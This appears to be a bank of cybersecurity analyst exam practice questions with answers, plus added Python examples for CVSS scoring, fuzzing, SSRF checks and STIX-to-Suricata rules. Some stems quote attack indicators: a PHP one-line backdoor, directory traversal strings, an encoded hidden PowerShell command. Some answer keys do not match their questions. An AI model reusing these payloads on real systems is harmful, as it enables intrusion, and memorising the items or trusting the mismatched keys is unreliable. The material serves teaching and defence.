A security analyst observes a high volume of SYN flags from an unexpected source toward a web application server within one hour. The traffic is not flagging for any exploit signatures. Which of the following describes this activity? A. A legitimate connection is continuously attempting to establish a connection with a downed web server B. A script kiddie is attempting to execute a DDoS through a ping flood attack C. An attacker is executing reconnaissance activities by mapping which ports are open and closed D. A web exploit attempt is likely occurring and the security analyst is not seeing it

An attacker is executing reconnaissance activities by mapping which ports are open and closed

A SIEM alert is triggered based on execution of a suspicious one-liner on two workstations in the organization's environment. An analyst views the details of these events below: Which of the following statements best describes the intent of the attacker, based on this one-liner? A. Attacker is escalating privileges via JavaScript B. Attacker is utilizing custom malware to download an additional script C. Attacker is executing PowerShell script "AccessToken.ps1" D. Attacker is attempting to install persistence mechanisms on the target machine

Attacker is executing PowerShell script "AccessToken.ps1"

A Chief Information Security Officer has determined through lessons learned and an associated after-actions report that staff members who use legacy applications do not adequately understand how to differentiate between non-malicious emails and phishing emails. Which of the following should the CISO include in an action plan to remediate this issue? A. Awareness training and education B. Replacement of legacy applications C. Organizational governance D. Multifactor authentication on all systems

Awareness training and education

A company was able to reduce triage time by focusing on historical trend analysis. The business partnered with the security team to achieve a 50% reduction in phishing attempts year over year. Which of the following action plans led to this reduced triage time? A. Patching B. Configuration management C. Awareness, education, and training D. Threat models

Awareness, education, and training

A user clicks on a malicious adware link, and the malware successfully downloads to the machine. The malware has a script that invokes command-and-control activity. Which of the following actions is the best way to contain the incident without any additional impact? A. Disable the user account until the malware investigation is complete B. Review EDR information to determine whether the file was detected and quarantined locally C. Block the server on the proxy and firewall D. Submit a recategorization plan

Block the server on the proxy and firewall

Which of the following should be performed first when creating a BCP to ensure that all critical functions and financial implications have been considered? A. Failover test B. Tabletop exercise C. Security policies D. Business impact analysis

Business impact analysis

An analyst has discovered the following suspicious command: "; $xyz = ($_REQUEST['xyz']); system($xyz); echo ""; die; }?> Which of the following would best describe the outcome of the command? A. Cross-site scripting B. Reverse Shell C. Backdoor attempt D. Logic bomb

Backdoor attempt

Which of the following best explains the importance of utilizing an incident response playbook? A. Routing table, registers, physical memory, archival media, hard disk, physical configuration B. Routing table, registers, physical memory, temporary partition, hard disk, physical configuration C. Cache, routing table, physical memory, network topology, temporary partition, hard disk D. Cache, routing table, physical memory, temporary partition, hard disk, physical configuration

Cache, routing table, physical memory, temporary partition, hard disk, physical configuration

Which of the following attributes is part of the Diamond Model of Intrusion Analysis? A. Delivery B. Weaponization C. Command and control D. Capability

Capability

A security analyst needs to support an organization's legal case against a threat actor. Which of the following processes provides the best way to assist in the prosecution of the case? A. Chain of custody B. Evidence gathering C. Securing the scene D. Forensic analysis

Chain of custody

A company's internet-facing web application has been compromised several times due to identified design flaws. The company would like to minimize the risk of these incidents reoccurring and has provided the developers with better security training. However, the company cannot allocate any more internal resources to the issue. Which of the following are the best options to identify flaws within the system? (choose two) A. Deploying a WAF B. Performing a forensic analysis C. Contracting a penetration test D. Holding a tabletop exercise E. Creating a bug bounty program F. Implementing threat modeling

Contracting a penetration test, creating a bug bounty program

During a recent site survey, an analyst discovered a rogue wireless access point on the network. Which of the following actions should be taken first to protect the network while preserving evidence? A. Run a packet sniffer to monitor traffic to and from the access point B. Connect to the access point and examine its log files C. Identify who is connected to the access point and attempt to find the attacker D. Disconnect the access point from the network

Disconnect the access point from the network

A user's computer is performing slower than the day before, and unexpected windows continually open and close. The user did not install any new programs, and after the user restarted the desktop, the issue was not resolved. Which of the following incident response actions should be taken next? A. Restart in safe mode and start a virus scan B. Disconnect from the network and leave the PC turned on C. Contain the device and implement a legal hold D. Reformat and reimage the OS

Disconnect from the network and leave the PC turned on

A Chief Finance Officer receives an email from someone who is possibly impersonating the company's Chief Executive Officer and requesting a financial operation. Which of the following should an analyst use to verify whether the email is an impersonation attempt? A. PKI B. MFA C. SMTP D. DKIM

DKIM (DomainKeys Identified Mail)

Numerous emails were sent to a company's customer distribution list. The customers reported that the emails contained a suspicious link. The company's SOC determined the links were malicious. Which of the following is the best way to decrease these emails? A. DMARC B. DKIM C. SPF D. SMTP

DMARC

Which of the following best explains the importance of the implementation of a secure software development life cycle in a company with an internal development team? A. Increase the product price by using the implementation as a piece of marketing B. Decreases the risks of the software usage and complies with regulatory requirements C. Improves the agile process and decreases the amount of tests before the final deployment D. Translates the responsibility for security flaws to the vulnerability management team

Decreases the risks of the software usage and complies with regulatory requirements

An analyst receives alerts that state the following traffic was identified on the perimeter network firewall: Which of the following best describes the indicator of compromise that triggered the alerts? A. Anomalous activity B. Bandwidth saturation C. Cryptomining D. Denial of service

Denial of Service

After an incident, a security analyst needs to perform a forensic analysis to report complete information to a company stakeholder. Which of the following is most likely the goal of the forensic analysis in this case? A. Provide a full picture of the existing risks B. Notify law enforcement of the incident C. Further contain the incident D. Determine root cause information

Determine root cause information

During an internal code review, software called "ACE" was discovered to have a vulnerability that allows the execution of arbitrary code. The vulnerability is in a legacy, third-party vendor resource that is used by the ACE software. ACE is used worldwide and is essential for many businesses in this industry. Developers informed the Chief Information Security Officer that removal of the vulnerability will take time. Which of the following is the first action to take? A. Look for potential IoCs in the company B. Inform customers about the vulnerability C. Remove the affected vendor resource from the ACE software D. Develop a compensating control until the issue can be fixed permanently

Develop a compensating control until the issue can be fixed permanently

Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target's information assets? A. Structured Threat Information Expression B. OWASP testing guide C. Open Source Security Testing Methodology Manual D. Diamond Model of Intrusion Analysis

Diamond Model of Intrusion Analysis

While reviewing the web server logs, a security analyst notices the following snippet: ..\../..\../boot.ini Which of the following is being attempted? A. Directory traversal B. Remote file inclusion C. Cross-site scripting D. Remote code execution E. Enumeration of /etc/password

Directory traversal

An analyst reviews the following web server log entries: %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/password No attacks or malicious attempts have been discovered. Which of the following most likely describes what took place? A. A SQL injection query took place to gather information from a sensitive file B. A PHP injection was leveraged to ensure that the sensitive file could not be accessed C. Base64 was used to prevent the IPS from detecting the fully encoded string D. Directory Traversal was performed to obtain a sensitive file for further reconnaissance

Directory traversal was performed to obtain a sensitive file for further reconnaissance

A security analyst runs the following command: # nmap -T4 -F 192.168.30.30 Starting nmap 7.6 Host is up (0.13s latency) PORT STATE SERVICE 23/tcp open telnet 443/tcp open https 636/tcp open ldaps Which of the following should the analyst recommend first to harden the system? A. Disable all protocols that do not use encryption B. Configure client certificates for domain services C. Ensure that this system is behind a NGFW D. Deploy a publicly trusted root CA for secure websites

Disable all protocols that do not use encryption

An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R Which of the following represents the exploit code maturity of this critical vulnerability? A. E:U B. S:C C. RC:R D. AV:N E. AC:L

E:U

An analyst is investigating a phishing incident and has retrieved the following as part of the investigation: cmd.exe /c c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - WindowStyle Hidden - ExecutionPolicy Bypass -NoLogo -NoProfile - EncodedCommand <VERY LONG STRING> Which of the following should the analyst use to gather more information about the purpose of this command? A. Echo the command payload content into 'base64 -d' B. Execute the command from a Windows VM C. Use a command console with administrator privileges to execute the code D. Run the command as an unprivileged user from the analyst workstation

Echo the command payload content into 'base64 -d'

A manufacturing company's assembly line machinery only functions on an end-of-life OS. Consequently, no patches exist for several highly exploitable OS vulnerabilities. Which of the following is the best mitigating control to reduce the risk of these current conditions? A. Enforce strict network segmentation to isolate vulnerable systems from the production network B. Increase the system resources for vulnerable devices to prevent denial of service C. Perform penetration testing to verify the exploitability of these vulnerabilities D. Develop in-house patches to address these vulnerabilities

Enforce strict network segmentation to isolate vulnerable systems from the production network

Which of the following is the best use of automation in cybersecurity? A. Ensure faster incident detection, analysis, and response B. Eliminate configuration errors when implementing new hardware C. Lower costs by reducing the number of necessary staff D. Reduce the time for internal user access requests

Ensure faster incident detection, analysis, and response

During an incident, analysis needs to be performed rapidly by the investigation and leadership teams. Which of the following best describes how PII should be safeguarded during an incident? A. Implement data encryption and close the data so only the company has access B. Ensure permissions are limited in the investigation team and encrypt the data C. Implement data encryption and create a standardized procedure for deleting data that is no longer needed D. Ensure permissions are open only to the company

Ensure permissions are limited in the investigation team and encrypt the data

An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (choose two) A. Ensure users the document system recovery plan prior to deployment B. Perform a full system-level backup following the change C. Leverage an audit tool to identify changes that are being made D. Identify assets with dependence that could be impacted by the change E. Require diagrams to be completed for all critical systems F. Ensure that all assets are properly listed in the inventory management system

Ensure users the document systems recovery plan prior to deployment, Identify assets with dependence that could be impacted by the change

An organization wants to establish a disaster recovery plan for critical applications that are hosted on premises. Which of the following is the first step to prepare for supporting this new requirement? A. Choose a vendor to utilize for the disaster recovery location B. Establish prioritization of continuity from data and business owners C. Negotiate vendor agreements to support disaster recovery capabilities D. Advise the leadership team that a geographical area for recovery must be defined

Establish prioritization of continuity from data and business owners

A security team identifies several rogue Wi-Fi access points during the most recent network scan. The network scans occur once per quarter. Which of the following controls would best allow the organization to identify rogue devices more quickly? A. Implement a continuous monitoring policy B. Implement BYOD policy C. Implement a portable wireless scanning policy D. Change the frequency of network scans to once per month

Implement a continuous monitoring policy

An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the initial hash of the evidence drive does not match the resultant hash of the imaged copy. Which of the following best describes the reason for the conflicting investigative findings? A. Chain of custody was not maintained for the evidence drive B. Legal authorization was not obtained prior to seizing the evidence drive C. Data integrity of the imaged drive could not be verified D. Evidence drive imaging was performed without a write blocker

Evidence drive imaging was performed without a write blocker

Exploit code for a recently disclosed critical software vulnerability was publicly available for download for several days before being removed. Which of the following CVSS v3.1 temporal metrics was most impacted by this exposure? A. Remediation level B. Exploit code maturity C. Report confidence D. Availability

Exploit code maturity
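Worked example, added here and not part of the original question set: the CVSS v3.1 temporal formula in Python, run over a constructed base score of 9.8. It shows that publishing working exploit code moves only Exploit Code Maturity (E); Remediation Level and Report Confidence are untouched. One caveat the formula makes visible: a metric left Not Defined (X) already weighs 1.0, the same as E:H, so a published exploit never pushes the score above the base score; it removes the discount that E:U or E:P had been granting.

```python
import math

# CVSS v3.1 temporal metric weights (specification section 7.2). The value
# "X" (Not Defined) always weighs 1.0, i.e. the same as the worst case.
EXPLOIT_CODE_MATURITY = {"X": 1.0, "H": 1.0, "F": 0.97, "P": 0.94, "U": 0.91}
REMEDIATION_LEVEL = {"X": 1.0, "U": 1.0, "W": 0.97, "T": 0.96, "O": 0.95}
REPORT_CONFIDENCE = {"X": 1.0, "C": 1.0, "R": 0.96, "U": 0.92}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup(): smallest one-decimal number >= value, using the
    specification's integer arithmetic so that 4.02 -> 4.1 but 4.00 -> 4.0
    even in the presence of floating-point noise."""
    int_input = round(value * 100000)
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def temporal_score(base_score: float, e: str = "X", rl: str = "X", rc: str = "X") -> float:
    """TemporalScore = Roundup(BaseScore x E x RL x RC)."""
    return roundup(base_score
                   * EXPLOIT_CODE_MATURITY[e]
                   * REMEDIATION_LEVEL[rl]
                   * REPORT_CONFIDENCE[rc])


def exploit_maturity_walk(base_score: float, rl: str = "X", rc: str = "X") -> dict:
    """Hold RL and RC fixed and vary only E. This is the single metric that the
    public release of working exploit code changes (Unproven -> Functional/High)."""
    return {e: temporal_score(base_score, e, rl, rc) for e in ("U", "P", "F", "H")}


if __name__ == "__main__":
    # Constructed scenario: critical vulnerability, base score 9.8, an official
    # fix exists (RL:O) and the vendor has confirmed the report (RC:C).
    for e, score in exploit_maturity_walk(9.8, rl="O", rc="C").items():
        print(f"E:{e} RL:O RC:C -> temporal score {score}")
```

Run it to see the score climb from 8.5 (E:U) to 9.4 (E:H) while the remediation and confidence factors stay constant; with every temporal metric left at X the result is simply the base score.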

A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next? A. Eradication B. Isolation C. Reporting D. Forensic analysis

Forensic analysis

Which of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power plant? A. Containerization B. Manual code reviews C. Static and dynamic analysis D. Formal methods

Formal methods

A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ensure the application will be able to handle unexpected strings with anomalous formats without crashing. Which of the following processes is the most applicable for testing the application to find how it would behave in such a situation? A. Fuzzing B. Code review C. Debugging D. Static analysis

Fuzzing

An organization identifies a method to detect unexpected behavior, crashes, or memory leaks in a system by feeding invalid, unexpected, or random data to stress the application. Which of the following best describes this testing methodology? A. Reverse engineering B. Static C. Fuzzing D. Debugging

Fuzzing
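Added example, not from the page: a minimal mutational fuzzer in Python, run against a constructed and deliberately fragile parser for the kind of "unexpected strings with anomalous formats" the service-desk question describes, next to a hardened version of the same parser that the fuzzer cannot crash. The ticket format, both parsers and the seed input are constructed for this illustration.

```python
import random
from typing import Callable, Dict, List, Optional

SEED_INPUT = "user=alice;subject=printer;priority=2"   # constructed well-formed ticket


def parse_ticket(raw: str) -> dict:
    """Target under test: fragile parser for the constructed 'field=value;...'
    ticket format. Every input shape the developer did not anticipate surfaces
    as an unhandled exception, i.e. a crash of the request handler."""
    fields = {}
    for pair in raw.split(";"):
        key, value = pair.split("=")              # ValueError: no '=' or more than one
        fields[key.strip()] = value
    fields["priority"] = int(fields["priority"])  # KeyError if absent, ValueError if not numeric
    return fields


def parse_ticket_hardened(raw: str) -> Optional[dict]:
    """Same format, but every malformed shape yields a controlled None instead
    of an exception: bounded length, exactly one '=' per pair, priority in 1..5."""
    if not isinstance(raw, str) or len(raw) > 4096:
        return None
    fields = {}
    for pair in raw.split(";"):
        if pair.count("=") != 1:
            return None
        key, value = pair.split("=")
        fields[key.strip()] = value
    prio = fields.get("priority", "")
    if not prio.isdecimal() or not 1 <= int(prio) <= 5:
        return None
    fields["priority"] = int(prio)
    return fields


def mutate(seed: str, rng: random.Random) -> str:
    """Apply one random structural mutation: this is what 'invalid, unexpected
    or random data' means in practice for a delimiter-based format."""
    ops: List[Callable[[str], str]] = [
        lambda s: s + rng.choice([";", "=", ";;", "==", "=;="]),            # dangling delimiters
        lambda s: s.replace("=", "", 1),                                    # drop a separator
        lambda s: s[: rng.randrange(len(s) + 1)],                           # truncate anywhere
        lambda s: ";".join(p for p in s.split(";") if not p.startswith("priority")),  # drop a required field
        lambda s: s.replace("priority=2", "priority=" + rng.choice(["", "high", "-1", "9" * 40])),
        lambda s: s * rng.randrange(2, 5),                                  # repetition / length blow-up
        lambda s: s + "".join(chr(rng.randrange(0x80, 0x10FFFF))           # non-ASCII noise
                              for _ in range(rng.randrange(1, 6))),
    ]
    return rng.choice(ops)(seed)


def fuzz(target: Callable[[str], object], seeds: List[str],
         iterations: int = 500, seed: int = 1) -> Dict[str, str]:
    """Mutational fuzzing campaign. Returns {exception class name: first input
    that raised it}: the class is the triage bucket, the input the reproducer."""
    rng = random.Random(seed)                      # fixed seed keeps the campaign reproducible
    crashes: Dict[str, str] = {}
    for _ in range(iterations):
        candidate = mutate(rng.choice(seeds), rng)
        try:
            target(candidate)
        except Exception as exc:                   # any unhandled exception counts as a crash
            crashes.setdefault(type(exc).__name__, candidate)
    return crashes


if __name__ == "__main__":
    for name, repro in fuzz(parse_ticket, [SEED_INPUT]).items():
        print(f"{name}: {repro!r}")
    print("hardened parser crashes:", fuzz(parse_ticket_hardened, [SEED_INPUT]))
```

The fragile parser produces two crash buckets (ValueError and KeyError) within a few hundred iterations; the hardened one produces none, which is the acceptance criterion for "handles unexpected strings without crashing".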

A Chief Information Security Officer wants to lock down users' ability to change the applications that are installed on their Windows systems. Which of the following is the best enterprise-level solution? A. HIPS B. GPO C. Registry D. DLP

GPO (group policy object)

A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incident without impacting operations? A. Review lessons-learned documentation and create a playbook B. Gather all internal incident response party members and perform a simulation C. Deploy known malware and document the remediation process D. Schedule a system recovery to the DR site for a few applications

Gather all internal incident response party members and perform a simulation

An analyst would like to start automatically ingesting IoCs into the EDR tool. Which of the following sources would be the most cost effective for the analyst to use? A. Government bulletins B. Social media C. Dark web D. Blogs

Government bulletins

SIMULATION Welcome to the Enterprise Help Desk System. Please work the ticket escalated to you in the help desk ticket queue. INSTRUCTIONS Click on the ticket to see the ticket details. Additional content is available on tabs within the ticket. First, select the appropriate issue from the drop-down menu. Then, select the MOST likely root cause from the second drop-down menu. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

High CPU Utilization, wuauclt.exe

A SOC receives several alerts indicating user accounts are connecting to the company's identity provider through non-secure communications. User credentials for accessing sensitive, business-critical systems could be exposed. Which of the following logs should the SOC use when determining malicious intent? A. DNS B. tcpdump C. Directory D. IDS

IDS (intrusion detection system)

A cybersecurity analyst is setting up a security control that monitors network traffic and produces an active response to a security event. Which of the following tools is the analyst configuring? A. EDR B. IPS C. CASB D. WAF

IPS (intrusion prevention system)

A company brings in a consultant to make improvements to its website. After the consultant leaves, a web developer notices unusual activity on the website and submits a suspicious file containing the following code to the security team: Which of the following did the consultant do? A. Implanted a backdoor B. Implemented privilege escalation C. Implemented clickjacking D. Patched the web server

Implanted a backdoor

An XSS vulnerability was reported on one of the non-sensitive/non-mission-critical public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following recommendations will best prevent this vulnerability from being exploited? (choose two) A. Implement an IPS in front of the web server B. Enable MFA on the website C. Take the website offline until it is patched D. Implement a compensating control in the source code E. Configure TLS v1.3 on the website F. Fix the vulnerability using a virtual patch at the WAF

Implement a compensating control in the source code, Fix the vulnerability using a virtual patch at the WAF

A WAF weekly report shows that a daily spike occurs from the same subnet. An open-source review indicates the IP addresses belong to a legitimate internet service provider but have been flagged for DDoS attacks and reconnaissance scanning in the past year. Which of the following activities should a SOC analyst take first in response to these traffic uptick activities? A. Recommend a firewall rule implementation to deny all traffic from the IP subnet B. Continue monitoring because the traffic spike did not cause any security notifications or concerns C. Review the network logs to identify the context of traffic and what action was taken D. Check the resource consumption levels to determine whether the uptick is due to a device performance issue

Review the network logs to identify the context of traffic and what action was taken

A security analyst must assist the IT department with creating a phased plan for vulnerability patching that meets established SLAs. Which of the following vulnerability management elements will best assist with prioritizing a successful plan? A. Affected hosts B. Risk score C. Mitigation strategy D. Annual recurrence

Risk score

A SOC manager reviews metrics from the last four weeks to investigate a recurring availability issue. The manager finds similar events correlating to the times of the reported issues. Which of the following methods would the manager most likely use to resolve the issue? A. Vulnerability assessment B. Root cause analysis C. Recurrence reports D. Lessons learned

Root cause analysis

An organization plans to use an advanced machine-learning tool as a central collection server. The tool will perform data aggregation and analysis. Which of the following should the organization implement? A. SIEM B. Firewalls C. Syslog server D. Flow analysis

SIEM

Which of the following documents sets requirements and metrics for a third-party response during an event? A. BIA B. DRP C. SLA D. MOU

SLA

A security analyst needs to block vulnerable ports and disable legacy protocols. The analyst has ensured NetBIOS, SMB, and TFTP are blocked and/or disabled. Which of the following additional protocols should the analyst block next? A. LDAPS v3 B. SNMP v1 C. TLS 1.3 D. Kerberos v5

SNMP v1

A SOC analyst determined that a significant number of reported alarms could be closed after removing the duplicates. Which of the following could help the analyst reduce the number of alarms with the least effort? A. SOAR B. API C. XDR D. REST

SOAR

A corporation wants to implement an agent-based endpoint solution to help: - Flag various threats - Review vulnerability feeds - Aggregate data - Provide real-time metrics by using scripting language Which of the following tools should the corporation implement to reach this goal? A. DLP B. Heuristics C. SOAR D. NAC

SOAR

Which of the following would eliminate the need for different passwords for a variety of internal applications? A. CASB B. SSO C. PAM D. MFA

SSO (single sign on)

A security analyst noticed the following entry in a web server log: Warning: fopen(http://127.0.0.1:16): failed to open stream: Connection refused in /hj/var/www/showimage.php on line 7 Which of the following malicious activities was most likely attempted? A. XSS B. CSRF C. SSRF D. RCE

SSRF (Server-side request forgery)
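Added example, not from the page: Python that pulls the fetch target out of the quoted PHP warning, classifies it, and shows the positive validation an image-fetch feature should apply instead of opening whatever URL it is handed. The allowlisted hostnames are an assumption. The loopback address and the odd port (16) are the tell: a user-controlled URL reached the server's own network stack, and a refused connection on a single low port is consistent with port probing through the vulnerable endpoint. Hostnames cannot be judged offline; a real control also resolves them and re-checks the resolved address at connect time to defeat DNS rebinding.

```python
import ipaddress
import re
from typing import Optional, Set
from urllib.parse import urlsplit

# The log line quoted in the question, used here as constructed sample input.
LOG_LINE = ("Warning: fopen(http://127.0.0.1:16): failed to open stream: "
            "Connection refused in /hj/var/www/showimage.php on line 7")

_FOPEN_TARGET = re.compile(r"fopen\s*\(\s*([^\s)]+)\s*\)")

ALLOWED_IMAGE_HOSTS = {"images.example.com", "cdn.example.net"}   # assumed allowlist


def extract_fopen_target(log_line: str) -> Optional[str]:
    """Pull the URL or path the application tried to open out of a PHP warning."""
    m = _FOPEN_TARGET.search(log_line)
    return m.group(1) if m else None


def classify_target(url: str) -> str:
    """Label what a server-side fetch was aimed at. Only IP literals can be
    judged offline; hostnames must be resolved and re-checked at connect time."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return f"non-http scheme ({parts.scheme or 'none'})"   # file://, gopher://, php://, ...
    host = parts.hostname
    if host is None:
        return "no host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Also catches shorthand such as 127.1 or 0x7f000001 that libc/curl
        # accept but this parser does not: one more reason an allowlist beats
        # a denylist of "bad" addresses.
        return "hostname (must resolve before judging)"
    if ip.is_loopback:
        return "loopback"
    if ip.is_private or ip.is_link_local:
        return "private/link-local (internal network or cloud metadata range)"
    if ip.is_multicast or ip.is_reserved or ip.is_unspecified:
        return "special-purpose address"
    return "public address"


def is_allowed_image_url(url: str, allowed_hosts: Set[str]) -> bool:
    """Positive validation for an image-fetch feature: http(s) only, no userinfo,
    exact hostname match against the allowlist, standard ports only."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:   # http://trusted.host@127.0.0.1/
        return False
    if parts.hostname is None or parts.hostname.lower() not in allowed_hosts:
        return False
    try:
        port = parts.port
    except ValueError:            # non-numeric or out-of-range port
        return False
    return port in (None, 80, 443)


if __name__ == "__main__":
    target = extract_fopen_target(LOG_LINE)
    print(target, "->", classify_target(target),
          "| allowed:", is_allowed_image_url(target, ALLOWED_IMAGE_HOSTS))
```

Note that the userinfo trick (`http://images.example.com@127.0.0.1/`) parses to a hostname of 127.0.0.1, which is why the check reads `parts.hostname` rather than string-matching the URL.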

A security analyst is reviewing a recent vulnerability scan report for a new server infrastructure. The analyst would like to make the best use of time by resolving the most critical vulnerability first. The following is provided: Which of the following should the analyst concentrate remediation efforts on first? A. SVR01 B. SVR02 C. SVR03 D. SVR04

SVR02

A cybersecurity analyst is recommending a solution to ensure emails that contain links or attachments are tested before they reach a mail server. Which of the following will the analyst most likely recommend? A. Sandboxing B. MFA C. DKIM D. Vulnerability scan

Sandboxing

An analyst needs to provide recommendations based on a recent vulnerability scan: Which of the following should the analyst recommend addressing to ensure potential vulnerabilities are identified? A. SMB use domain SID to enumerate users B. SYN scanner C. SSL certificate cannot be trusted D. Scan not performed with admin privileges

Scan not performed with admin privileges

Results of a SOC customer service evaluation indicate high levels of dissatisfaction with the inconsistent services provided after regular work hours. To address this, the SOC lead drafts a document establishing customer expectations regarding the SOC's performance and quality of services. Which of the following documents most likely fits this description? A. Risk management plan B. Vendor agreement C. Incident response plan D. Service-level agreement

Service-level agreement

Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported? (choose two) A. Signal-shielded bag B. Tamper-evident seal C. Thumb drive D. Crime scene tape E. Write blocker F. Drive duplicator

Signal-shielded bag, Tamper-evident seal

Which of the following features is a key component of Zero trust architecture? A. Single strong source of user identity B. Implementation of IT governance C. Quality assurance D. Internal auditing process

Single strong source of user identity

SIMULATION An organization's website was maliciously altered INSTRUCTIONS Review information in each tab to select the source IP the analyst should be concerned about, the indicator of compromise, and the two appropriate corrective actions

Source IP the analyst should be most concerned about: 32.111.16.37; Indicator of compromise: modified index.html file; Corrective actions: change the password on the sjames account, block external SFTP access

A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Which of the following best describes what the analyst will be creating? A. Bots B. IoCs C. TTPs D. Signatures

TTPs

Before adopting a disaster recovery plan, some team members need to gather in a room to review the written scenarios. Which of the following best describes what the team is doing? A. Simulation B. Tabletop exercise C. Full test D. Parallel test

Tabletop exercise

A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the following output: Which of the following is the most likely reason for this vulnerability? A. The developer set input validation protection on the specific field of search.aspx B. The developer did not set proper cross-site scripting protections in the header C. The developer did not implement default protections in the web application build D. The developer did not set proper cross-site request forgery protections

The developer did not set proper cross-site scripting protections in the header

The analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason the firewall feed stopped working? A. The firewall service account was locked out B. The firewall was using a paid feed C. The firewall certificate expired D. The firewall failed open

The firewall certificate expired

A newly hired security manager in a SOC wants to improve efficiency by automating routine tasks. Which of the following SOC tasks is most suitable for automation? A. The generation of NIDS rules based on received STIX messages B. The fulfillment of privileged access requests to enterprise domain controllers C. The verification of employee identities prior to initial PKI enrollment D. The analysis of suspected malware binaries captured by an email gateway

The generation of NIDS rules based on received STIX messages
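Added example, not from the page: what the automated path from a STIX indicator to a NIDS rule can look like in Python, with constructed STIX 2.1 indicator objects standing in for received messages and Suricata rule syntax as the output. The point a practitioner wants alongside the automation is the validation: an indicator feed is untrusted input to the rule engine, so the generator translates only patterns it can map exactly (single IPv4 or domain comparisons), skips file hashes and compound patterns, refuses addresses that would alert on the whole internal network, keeps feed text out of rule syntax, and allocates sids from a private range.

```python
import ipaddress
import re
from typing import Dict, List, Optional

# Only single comparison expressions are translated. Compound patterns (AND/OR,
# WITHIN) and file hashes, which a NIDS cannot match on the wire, are skipped.
_SIMPLE_PATTERN = re.compile(r"^\[(?P<path>[A-Za-z0-9_:\-.]+)\s*=\s*'(?P<value>[^']*)'\]$")
_DOMAIN_OK = re.compile(r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
                        r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)+$")
_LABEL_OK = re.compile(r"^[A-Za-z0-9 _.-]{1,64}$")   # keeps feed text out of rule syntax
_NEVER_ALERT_ON = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4")]   # a feed entry here would fire everywhere


def stix_pattern_to_rule(pattern: str, sid: int, label: str) -> Optional[str]:
    """Translate one STIX pattern into one Suricata rule, or None if it cannot
    be translated exactly and safely."""
    m = _SIMPLE_PATTERN.match(pattern.strip())
    if not m or not _LABEL_OK.match(label):
        return None
    path, value = m.group("path"), m.group("value")
    if path == "ipv4-addr:value":
        try:
            ip = ipaddress.IPv4Address(value)
        except ValueError:
            return None
        if any(ip in net for net in _NEVER_ALERT_ON):
            return None
        return (f'alert ip $HOME_NET any -> {ip} any '
                f'(msg:"CTI {label} ipv4 {ip}"; classtype:trojan-activity; sid:{sid}; rev:1;)')
    if path == "domain-name:value":
        if not _DOMAIN_OK.match(value):
            return None
        # dotprefix + endswith matches bad.example and sub.bad.example, not notbad.example
        return (f'alert dns $HOME_NET any -> any any '
                f'(msg:"CTI {label} domain {value}"; dns.query; dotprefix; content:".{value}"; '
                f'nocase; endswith; classtype:trojan-activity; sid:{sid}; rev:1;)')
    return None


def rules_from_indicators(indicators: List[Dict], base_sid: int = 9000000) -> Dict[str, List[str]]:
    """Walk decoded STIX 2.x indicator objects and emit Suricata rules.
    Returns {"rules": [...], "skipped": [indicator id, ...]}. Sids come from a
    private range so they cannot collide with vendor rulesets."""
    out: Dict[str, List[str]] = {"rules": [], "skipped": []}
    sid = base_sid
    for obj in indicators:
        if obj.get("type") != "indicator" or obj.get("revoked"):
            out["skipped"].append(obj.get("id", "?"))
            continue
        rule = stix_pattern_to_rule(obj.get("pattern", ""), sid, obj.get("name", "indicator"))
        if rule is None:
            out["skipped"].append(obj.get("id", "?"))
            continue
        out["rules"].append(rule)
        sid += 1
    return out


# Constructed STIX 2.1 indicator objects standing in for a received bundle.
SAMPLE_INDICATORS = [
    {"type": "indicator", "id": "indicator--0001", "name": "C2 server",
     "pattern": "[ipv4-addr:value = '203.0.113.5']"},
    {"type": "indicator", "id": "indicator--0002", "name": "Phishing domain",
     "pattern": "[domain-name:value = 'login-example.invalid']"},
    {"type": "indicator", "id": "indicator--0003", "name": "Misconfigured feed entry",
     "pattern": "[ipv4-addr:value = '10.0.0.1']"},
    {"type": "indicator", "id": "indicator--0004", "name": "Dropper",
     "pattern": "[file:hashes.'SHA-256' = '" + "a" * 64 + "']"},
    {"type": "indicator", "id": "indicator--0005", "name": "Rule injection attempt\"; sid:1; #",
     "pattern": "[domain-name:value = 'evil.invalid']"},
]

if __name__ == "__main__":
    result = rules_from_indicators(SAMPLE_INDICATORS)
    print("\n".join(result["rules"]))
    print("skipped:", result["skipped"])
```

Two of the five constructed indicators become rules; the RFC 1918 address, the file hash and the indicator whose name carries rule syntax are reported as skipped rather than silently dropped, so the automation leaves an audit trail for the analyst.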

